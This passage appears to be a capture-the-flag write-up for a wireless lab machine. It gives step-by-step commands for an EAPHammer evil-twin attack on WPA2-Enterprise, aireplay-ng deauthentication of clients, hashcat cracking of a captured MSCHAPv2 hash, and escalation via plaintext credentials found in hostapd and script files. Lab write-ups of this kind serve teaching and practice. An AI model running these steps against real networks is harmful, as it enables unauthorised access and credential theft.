That last line is why sniffing "tablet traffic" felt dead — even if multiple clients exist, they're isolated at L2.

Other SSIDs

Enumerating hostapd_other*.conf shows the remaining WLANs are just "neighbor WiFi" PSKs, each with its own hardcoded passphrase.

axura @ labyrinth :~ 
root@AirTouch-AP-PSK:~# for f in psk/hostapd_other*.conf; do
>   echo "===================="
>   echo "$f"
>   echo "===================="
>   cat "$f"
>   echo
> done
====================
psk/hostapd_other0.conf
====================
interface=wlan8
driver=nl80211

hw_mode=g
channel=3
ssid=MOVISTAR_FG68

wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase="bvZmh2dQ5ZC5Fe79YLzViAijK"

====================
psk/hostapd_other1.conf
====================
interface=wlan9
driver=nl80211

hw_mode=g
channel=6
ssid=WIFI-JOHN

wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase="XX3e7CugmAwtc5HV5KqnkYx27"

====================
psk/hostapd_other2.conf
====================
interface=wlan10
driver=nl80211

hw_mode=g
channel=1
ssid=vodafoneFB6N

wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
wpa_passphrase="obwk4PxNRY7HZcStaP4LELhpF"

====================
psk/hostapd_other3.conf
====================
interface=wlan11
driver=nl80211

hw_mode=g
channel=9
ssid=MiFibra-24-D4VY

wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_passphrase="TYYHbhajPnHxcHuCt2d3xRyMK"

Office VLAN Credentials

The real pivot is hidden in send_certs.sh:

Bash
#!/bin/bash

# DO NOT COPY
# Script to sync certs-backup folder to AirTouch-office.

# Define variables
REMOTE_USER="remote"
REMOTE_PASSWORD="xGgWEwqUpfoOVsLeROeG"
REMOTE_PATH="~/certs-backup/"
LOCAL_FOLDER="/root/certs-backup/"

# Use sshpass to send the folder via SCP
sshpass -p "$REMOTE_PASSWORD" scp -r "$LOCAL_FOLDER" "$REMOTE_USER@10.10.10.1:$REMOTE_PATH"

So we now have a clean target and credentials:

  • Host: 10.10.10.1 (Office VLAN gateway)
  • SSH: remote / xGgWEwqUpfoOVsLeROeG

Next step: jump into the AirTouch-Office network.

4.2 EAPHammer

4.2.1 EAPHammer 101

Back on AirTouch-Consultant, we already had a gift waiting in /root:

axura @ labyrinth :~ 
root@AirTouch-Consultant:~# ls -a
.   .bash_history  .cache  .profile  .wget-hsts  linpeas.sh
..  .bashrc        .gnupg  .ssh      eaphammer

root@AirTouch-Consultant:~# ls eaphammer/
Changelog          core                   logs                       run
ESSIDStripping.md  db                     loot                       saved-configs
LICENSE            docs                   parrot-dependencies.txt    scripts
README.md          eaphammer              parrot-setup               settings
SECURITY.md        ehdb                   payload_generator          templates
__version__.py     forge-beacons          payloads                   testing
base               kali-dependencies.txt  pip.req                    tmp
cert_wizard        kali-setup             raspbian-dependencies.txt  ubuntu-unattended-setup
certs              local                  raspbian-setup             wordlists

EAPHammer is an evil-twin framework for WPA-Enterprise (802.1X) networks. The idea is simple:

We impersonate the corporate WiFi, bait a client into authenticating, then steal creds (or hashes).

4.2.2 EAPHammer Workflow

4.2.2.1 Build an Evil Twin AP

Clone SSID: AirTouch-Office

4.2.2.2 Host a Fake RADIUS/EAP Server

When a corporate client tries to connect, the rogue AP says:

"Hi, authenticate."

4.2.2.3 Capture the Creds

Depending on the EAP method, we might get:

  • plaintext creds (rare)
  • MSCHAPv2 challenge/response (common)

MSCHAPv2 can be cracked offline to recover the real password, letting us:

  • join the real AirTouch-Office
  • pivot into the corp VLAN 10.10.10.0/24

4.2.3 Coporate Wifi

Corporate WiFi usually means:

  • WPA2-Enterprise
  • 802.1X authentication
  • EAP methods (PEAP/TTLS/TLS)
  • backed by RADIUS

So instead of PSKs, clients authenticate with:

  • username/password (most common)
  • certificates (more painful)

To confirm what AirTouch-Office is running:

axura @ labyrinth :~ 
root@AirTouch-Consultant:~# iw dev wlan3 scan | sed -n '/SSID: AirTouch-Office/,+25p'
        SSID: AirTouch-Office
        Supported rates: 6.0* 9.0 12.0* 18.0 24.0* 36.0 48.0 54.0
        DS Parameter set: channel 44
        Country: ES     Environment: Indoor/Outdoor
                Channels [36 - 48] @ 23 dBm
                Channels [149 - 169] @ 13 dBm
        RSN:     * Version: 1
                 * Group cipher: CCMP
                 * Pairwise ciphers: CCMP
                 * Authentication suites: IEEE 802.1X
                 * Capabilities: 16-PTKSA-RC 1-GTKSA-RC (0x000c)
        Extended capabilities:
                 * Extended Channel Switching
                 * Multiple BSSID
                 * SSID List
                 * Operating Mode Notification
        WMM:     * Parameter version 1
                 * BE: CW 15-1023, AIFSN 3
                 * BK: CW 127-32767, AIFSN 7
                 * VI: CW 32767-32767, AIFSN 3, TXOP 3008 usec
                 * VO: CW 32767-32767, AIFSN 7, TXOP 1504 usec
BSS ac:8b:a9:f3:a1:13(on wlan3)
        last seen: 14602.456s [boottime]
        TSF: 1768736686013647 usec (20471d, 11:44:46)
        freq: 5220
        beacon interval: 100 TUs
        SSID: AirTouch-Office
        Supported rates: 6.0* 9.0 12.0* 18.0 24.0* 36.0 48.0 54.0
        DS Parameter set: channel 44
        Country: ES     Environment: Indoor/Outdoor
                Channels [36 - 48] @ 23 dBm
                Channels [149 - 169] @ 13 dBm
        RSN:     * Version: 1
                 * Group cipher: CCMP
                 * Pairwise ciphers: CCMP
                 * Authentication suites: IEEE 802.1X
                 * Capabilities: 16-PTKSA-RC 1-GTKSA-RC (0x000c)
        Extended capabilities:
                 * Extended Channel Switching
                 * Multiple BSSID
                 * SSID List
                 * Operating Mode Notification
        WMM:     * Parameter version 1
                 * BE: CW 15-1023, AIFSN 3
                 * BK: CW 127-32767, AIFSN 7
                 * VI: CW 32767-32767, AIFSN 3, TXOP 3008 usec
                 * VO: CW 32767-32767, AIFSN 7, TXOP 1504 usec

AirTouch-Office = WPA2-Enterprise (IEEE 802.1X), so there is NO PSK to crack.

4.2.4 PKMID

Now we just need a station attempting to connect.

Monitor channel 44:

Bash
ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up

airodump-ng -c 44 wlan0

We see two APs under the same SSID, plus several clients:

axura @ labyrinth :~ 

 CH 44 ][ Elapsed: 54 s ][ 2026-01-18 12:03 ][ WPA handshake: AC:8B:A9:AA:3F:D2 

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 AC:8B:A9:F3:A1:13  -28 100      561        0    0  44   54e  WPA2 CCMP   MGT  AirTouch-Offic
 AC:8B:A9:AA:3F:D2  -28 100      561       52    0  44   54e  WPA2 CCMP   MGT  AirTouch-Offic
 66:A4:A1:1E:5E:97  -28 100      562        0    0   1   54        TKIP   PSK  vodafoneFB6N  

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 AC:8B:A9:AA:3F:D2  28:6C:07:12:EE:A1  -29    6e- 6e     0       33  PMKID  AirTouch-Office
 AC:8B:A9:AA:3F:D2  28:6C:07:12:EE:F3  -29    6e- 6e     0       40  PMKID  AirTouch-Office
 AC:8B:A9:AA:3F:D2  C8:8A:9A:6F:F9:D2  -29    0 -48e     0        8         AirTouch-Office

APs (same SSID)

  • AC:8B:A9:F3:A1:13 (MGT / WPA2-Enterprise)
  • AC:8B:A9:AA:3F:D2 (MGT / WPA2-Enterprise)

Clients Seen on AirTouch-Office

  • 28:6C:07:12:EE:A1PMKID
  • 28:6C:07:12:EE:F3PMKID
  • C8:8A:9A:6F:F9:D2 → normal traffic

A PMKID capture is useful for PSK networks, but here the real win is: we have active clients to lure.

4.2.5 EAPHammer Exploit

Phase 1 — Lock BSSID / Channel

On consultant root (sniffer interface monitor mode):

Bash
ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up

airodump-ng --band a wlan0

Pick one AP (seen in 4.2.4) and lock onto it:

Bash
airodump-ng -c 44 --bssid AC:8B:A9:AA:3F:D2 -w /tmp/office wlan0

Leave it running.

Phase 2 — Evil Twin Harvest Creds

On AirTouch-AP-PSK (192.168.3.1) we already recovered valid cert material: /root/certs-backup/{ca.crt,server.crt,server.key}.

Copy them to the consultant host:

Bash
# on AP host
# use password: RxBlZhLmOkacNWScmZ6D
scp /root/certs-backup/ca.crt [email protected]:/tmp/ca.crt
scp /root/certs-backup/server.crt [email protected]:/tmp/server.crt
scp /root/certs-backup/server.key [email protected]:/tmp/server.key

Import into eaphammer:

Bash
# on consultant host as root
cd /root/eaphammer
./eaphammer --cert-wizard import \
            --server-cert /tmp/server.crt \
            --private-key /tmp/server.key \
            --ca-cert /tmp/ca.crt

Activate eaphammer:

axura @ labyrinth :~ 
                     .__
  ____ _____  ______ |  |__ _____    _____   _____   ___________
_/ __ \\__  \ \____ \|  |  \\__  \  /     \ /     \_/ __ \_  __ \
\  ___/ / __ \|  |_> >   Y  \/ __ \|  Y Y  \  Y Y  \  ___/|  | \/
 \___  >____  /   __/|___|  (____  /__|_|  /__|_|  /\___  >__|
     \/     \/|__|        \/     \/      \/      \/     \/


                        Now with more fast travel than a next-gen Bethesda game. >:D

                             Version:  1.14.0
                            Codename:  Final Frontier
                              Author:  @s0lst1c3
                             Contact:  gabriel<<at>>transmitengage.com


[?] Am I root?
[*] Checking for rootness...
[*] I AM ROOOOOOOOOOOOT
[*] Root privs confirmed! 8D
Case 1: Import all separate
[CW] Ensuring server cert, CA cert, and private key are valid...
/tmp/server.crt
/tmp/server.key
/tmp/ca.crt
[CW] Complete!
[CW] Loading private key from /tmp/server.key
[CW] Complete!
[CW] Loading server cert from /tmp/server.crt
[CW] Complete!
[CW] Loading CA certificate chain from /tmp/ca.crt
[CW] Complete!
[CW] Constructing full certificate chain with integrated key...
[CW] Complete!
[CW] Writing private key and full certificate chain to file...
[CW] Complete!
[CW] Private key and full certificate chain written to: /root/eaphammer/certs/server/AirTouch
CA.pem
[CW] Activating full certificate chain...
[CW] Complete!

This is the real weapon: a legit-looking cert chain means clients won't immediately panic.

Phase 3 — Start the Evil Twin

Bring up the rogue AirTouch-Office:

Bash
./eaphammer \
  --interface wlan4 \
  --channel 44 \
  --essid "AirTouch-Office" \
  --auth wpa-eap \
  --creds \
  --karma

Now wlan4 is broadcasting a fake AirTouch-Office on channel 44, waiting for a victim to authenticate:

axura @ labyrinth :~ 
[ … snip … ]
[*] Success: wlan4 no longer controlled by NetworkManager.
[!] The hw_mode specified in hostapd.ini is invalid for the selected channel (g, 44)
[!] Falling back to hw_mode: a
[*] WPA handshakes will be saved to /root/eaphammer/loot/wpa_handshake_capture-2026-01-19-00-2
8-35-mc0IZDwJtjdQ4xJvVntdu45hDyBtwS9C.hccapx

[hostapd] AP starting...

Configuration file: /root/eaphammer/tmp/hostapd-2026-01-19-00-28-35-2V64be14H1Q3KjSwNhb8b0TPLM
sEniFG.conf
rfkill: Cannot open RFKILL control device
wlan4: interface state UNINITIALIZED->COUNTRY_UPDATE
Using interface wlan4 with hwaddr 00:11:22:33:44:00 and ssid "AirTouch-Office"
wlan4: interface state COUNTRY_UPDATE->ENABLED
wlan4: AP-ENABLED

Press enter to quit...

Phase 4 - Deauth the Real Clients

To force clients off the real AP and into our twin:

Bash
ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up

# hard-lock wlan0 channel before injection
iw dev wlan0 set channel 44

Deauth (try broadcast first then both if needed):

Bash
# 1) Don't aim at a station yet. First do broadcast deauth
aireplay-ng -0 10 -a AC:8B:A9:AA:3F:D2 wlan0
aireplay-ng -0 10 -a AC:8B:A9:F3:A1:13 wlan0

# 2) If stations appear/reconnect, then do targeted deauth
aireplay-ng -0 10 -a AC:8B:A9:AA:3F:D2 -c 28:6C:07:12:EE:F3 wlan0

And the moment a client bites, eaphammer spills the loot:

axura @ labyrinth :~ 
[ … snip … ]
         challenge:                     f4:de:34:71:68:c9:8b:ac
         response:                      28:ac:0d:f7:79:7e:70:ac:8e:db:d0:db:4a:74:4a:89:c9:33:
af:19:df:99:57:32

         jtr NETNTLM:                   r4ulcl:$NETNTLM$f4de347168c98bac$28ac0df7797e70ac8edbd
0db4a744a89c933af19df995732

         hashcat NETNTLM:               r4ulcl::::28ac0df7797e70ac8edbd0db4a744a89c933af19df99
5732:f4de347168c98bac


wlan4: CTRL-EVENT-EAP-FAILURE 28:6c:07:12:ee:f3
wlan4: STA 28:6c:07:12:ee:f3 IEEE 802.1X: authentication failed - EAP type: 0 (unknown)
wlan4: STA 28:6c:07:12:ee:f3 IEEE 802.1X: Supplicant used different EAP type: 25 (PEAP)
wlan4: STA 28:6c:07:12:ee:f3 IEEE 802.11: deauthenticated due to local deauth request
wlan4: STA 28:6c:07:12:ee:f3 IEEE 802.11: authenticated
wlan4: STA 28:6c:07:12:ee:f3 IEEE 802.11: associated (aid 1)
wlan4: CTRL-EVENT-EAP-STARTED 28:6c:07:12:ee:f3
wlan4: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
wlan4: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25

Harvested MSCHAPv2 (PEAP) creds → which gives us a NETNTLM hash to crack offline.

4.3 NETNTLM

Eaphammer gave us an MSCHAPv2 challenge/response from PEAP. Hashcat mode for this is 5500:

Bash
cat > mschapv2.hash << 'EOF'
r4ulcl::::d3b5c9b9247d754d6a5dcc0757b219e7b799f588cf11b3f2:8ef004bc2ccbcca4
EOF

hashcat -m 5500 -a 0 mschapv2.hash /usr/share/wordlists/rockyou.txt --force

Result:

Hashcat
r4ulcl::::d3b5c9b9247d754d6a5dcc0757b219e7b799f588cf11b3f2:8ef004bc2ccbcca4:laboratory

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5500 (NetNTLMv1 / NetNTLMv1+ESS)
Hash.Target......: r4ulcl::::d3b5c9b9247d754d6a5dcc0757b219e7b799f588c...cbcca4

Credential recovered: r4ulcl / laboratory

4.4 Office VLAN

Now we use the valid PEAP creds to authenticate into the Enterprise SSID AirTouch-Office, which drops us into the office VLAN.

Bash
# 1) bring up any unused vlan on client (consultant), e.g., 6
ip link set wlan6 up
# verify
iw dev wlan6 info

# 2) create PEAP config with identity including domain
cat > /tmp/office.conf <<'EOF'
network={
    ssid="AirTouch-Office"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="AirTouch\r4ulcl"
    password="laboratory"
}
EOF


# 3) connect
wpa_supplicant -B -D nl80211 -i wlan6 -c /tmp/office.conf

# 4) get DHCP lease
dhclient -v wlan6

# 5) verify
ip -br a | grep wlan6

Now we have access to the AirTouch-Office wifi with IP 10.10.10.38, then connect SSH 10.10.10.1 with the found creds remote / xGgWEwqUpfoOVsLeROeG (from send_certs.sh on AP host):

axura @ labyrinth :~ 
root@AirTouch-Consultant:~# ip -br a | grep wlan6
wlan6            UP             10.10.10.38/24 fe80::ff:fe00:600/64

root@AirTouch-Consultant:~# ssh [email protected]
The authenticity of host '10.10.10.1 (10.10.10.1)' can't be established.
ECDSA key fingerprint is SHA256:/lSCXr95A71FBCcQ9DT1xXMFeCAsLEnCUfSwu/3qPoE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.1' (ECDSA) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-216-generic x86_64)

remote@AirTouch-AP-MGT:~$ id
uid=1000(remote) gid=1000(remote) groups=1000(remote)

remote@AirTouch-AP-MGT:~$ ls /home
admin  remote

Now we're inside AirTouch-AP-MGT, the AP management host — and we can already see the next target user: admin.

4.5 Hostapd EAP

Enum running processes:

axura @ labyrinth :~ 
remote@AirTouch-AP-MGT:/tmp$ ps axu
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.0   2608   592 ?        Ss   Jan18   0:00 /bin/sh -c service ssh start && tail -f /dev/null
root          14  0.0  0.1  12188  4228 ?        Ss   Jan18   0:06 sshd: /usr/sbin/sshd [listener] 0 of 10-100 startups
root          15  0.0  0.0   2544   576 ?        S    Jan18   0:03 tail -f /dev/null
root          27  0.0  0.0   3976  2964 ?        Ss   Jan18   0:00 bash /root/start.sh
root          45  0.0  0.1  10712  7936 ?        S    Jan18   1:13 hostapd_aps /root/mgt/hostapd_wpe.conf
root          46  0.0  0.1  10572  7836 ?        S    Jan18   0:47 hostapd_aps /root/mgt/hostapd_wpe2.conf
root          63  0.0  0.0   9300  3572 ?        S    Jan18   0:00 dnsmasq -d
root      286118  0.0  0.2  13912  9076 ?        Ss   12:28   0:00 sshd: remote [priv]
remote    286194  0.0  0.1  13912  5252 ?        R    12:29   0:00 sshd: remote@pts/0
remote    286195  0.0  0.0   4240  3556 pts/0    Ss   12:29   0:00 -bash
remote    289098  0.0  0.0   5892  2868 pts/0    R+   12:44   0:00 ps axu

We immediately spot the enterprise stack running:

  • hostapd_aps /root/mgt/hostapd_wpe.conf
  • hostapd_aps /root/mgt/hostapd_wpe2.conf
  • dnsmasq -d

4.5.1 Hostapd 101

hostapd, aka Host Access Point Daemon, is the Linux service that turns a WiFi interface into an Access Point.

In this setup:

  • AirTouch-Internet = WPA2-PSK
  • AirTouch-Office = WPA2-Enterprise (802.1X / PEAP)

4.5.2 Hostapd User Database

LinPEAS points to the real gold:

/etc/hostapd/hostapd_wpe.eap_user is literally the Phase2 credential database for the used inside PEAP:

INI
# hostapd user database for integrated EAP server

[ ... snip ...]

# WPE - DO NOT REMOVE - These entries are specifically in here
*       PEAP,TTLS,TLS,FAST
#"t"    TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2  "t"     [2]

*       PEAP,TTLS,TLS,FAST [ver=1]
#"t"    GTC,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "password" [2]

"AirTouch\r4ulcl"       MSCHAPV2        "laboratory" [2]
"admin"                 MSCHAPV2        "xMJpzXt4D9ouMuL3JJsMriF7KZozm7" [2]

This is the local authentication DB for WPA-Enterprise:

  • MSCHAPv2 = the inner "username/password" auth used inside PEAP tunnel
  • [2] = phase2 (inside encrypted PEAP tunnel), i.e. the real login

So admin / xMJpzXt4D9ouMuL3JJsMriF7KZozm7 — we are now upgraded from a low user → admin creds in plaintext.

Switch user, check privileges, and escalate:

axura @ labyrinth :~ 
remote@AirTouch-AP-MGT:/tmp$ su admin
Password:
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

admin@AirTouch-AP-MGT:/tmp$ sudo -l
Matching Defaults entries for admin on AirTouch-AP-MGT:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User admin may run the following commands on AirTouch-AP-MGT:
    (ALL) ALL
    (ALL) NOPASSWD: ALL
    
admin@AirTouch-AP-MGT:/tmp$ sudo su

root@AirTouch-AP-MGT:/tmp# id
uid=0(root) gid=0(root) groups=0(root)

root@AirTouch-AP-MGT:/tmp# cat /root/root.txt
39******************************e8

Rooted.